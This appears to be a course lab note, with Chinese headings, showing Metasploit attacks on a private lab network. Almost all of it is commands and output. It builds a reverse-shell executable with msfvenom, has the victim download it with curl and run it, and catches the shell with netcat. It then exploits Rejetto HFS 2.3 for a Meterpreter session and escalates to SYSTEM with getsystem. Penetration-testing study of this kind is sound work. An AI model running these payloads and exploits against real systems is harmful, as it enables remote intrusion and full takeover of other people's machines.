Metasploit Framework

Metasploit Framework === # msfvenom (產生payload的工具) Attacker ``` ──(kali㉿kali)-[~/NTUST-Hacking] └─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.230.128 LPORT=8787 -f exe -o virus.exe ``` ``` ──(kali㉿kali)-[~/NTUST-Hacking] └─$ python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` Victim ``` C:\Users\Red>curl http://192.168.230.128:80/virus.exe > virus.exe ``` Attacker ``` ──(kali㉿kali)-[~/NTUST-Hacking] └─$ netcat -lvnp 8787 listening on [any] 8787 ... ``` Victim ``` C:\Users\Red>virus.exe ``` Attacker ``` ──(kali㉿kali)-[~/NTUST-Hacking] └─$ netcat -lvnp 8787 listening on [any] 8787 ... connect to [192.168.230.128] from (UNKNOWN) [192.168.230.129] 50152 Microsoft Windows [Version 10.0.22621.4169] (c) Microsoft Corporation. All rights reserved. C:\Users\Red>shutdown /r /t 0 shutdown /r /t 0 ``` # msfconsole (發動漏洞利用的工具) Attacker ``` ┌──(kali㉿kali)-[~/NTUST-Hacking] └─$ nmap -sV -sC 192.168.230.129 PORT STATE SERVICE VERSION ... 8080/tcp open http HttpFileServer httpd 2.3 |_http-title: HFS / |_http-server-header: HFS 2.3 ... ``` 上網查HFS 2.3，有無vulnerability ![image](https://hackmd.io/_uploads/Bywm42oTA.png) ``` ┌──(kali㉿kali)-[~/NTUST-Hacking] └─$ msfconsole ... msf6 > search HFS 2.3 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- ... 4 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution ... msf6 > info exploit/windows/http/rejetto_hfs_exec ``` 決定利用exploit/windows/http/rejetto_hfs_exec模組 ``` msf6 > use exploit/windows/http/rejetto_hfs_exec msf6 exploit(windows/http/rejetto_hfs_exec) > show options Module options (exploit/windows/http/rejetto_hfs_exec): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 no Seconds to wait before terminating web server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.230.129 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics /using-metasploit.html RPORT 8080 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes The path of the web application URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.230.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.230.129 msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080 msf6 exploit(windows/http/rejetto_hfs_exec) > exploit [*] Started reverse TCP handler on 192.168.230.128:4444 [*] Using URL: http://192.168.230.128:8080/kwasbp [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /kwasbp [*] Sending stage (176198 bytes) to 192.168.230.129 [!] Tried to delete %TEMP%\yuqCgIpSBxjZnA.vbs, unknown result [*] Meterpreter session 1 opened (192.168.230.128:4444 -> 192.168.230.129:49868) at 2024-09-20 23:29:21 -0400 [*] Server stopped. meterpreter > sysinfo Computer : NTUST-HACKING-1 OS : Windows 11 (10.0 Build 22621). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > getuid Server username: NTUST-HACKING-1\Red meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 4552 created. Channel 2 created. Microsoft Windows [Version 10.0.22621.4169] (c) Microsoft Corporation. All rights reserved. C:\Users\Red\Desktop\hfs2.3_288>powershell -ep bypass powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\Users\Red\Desktop\hfs2.3_288> ```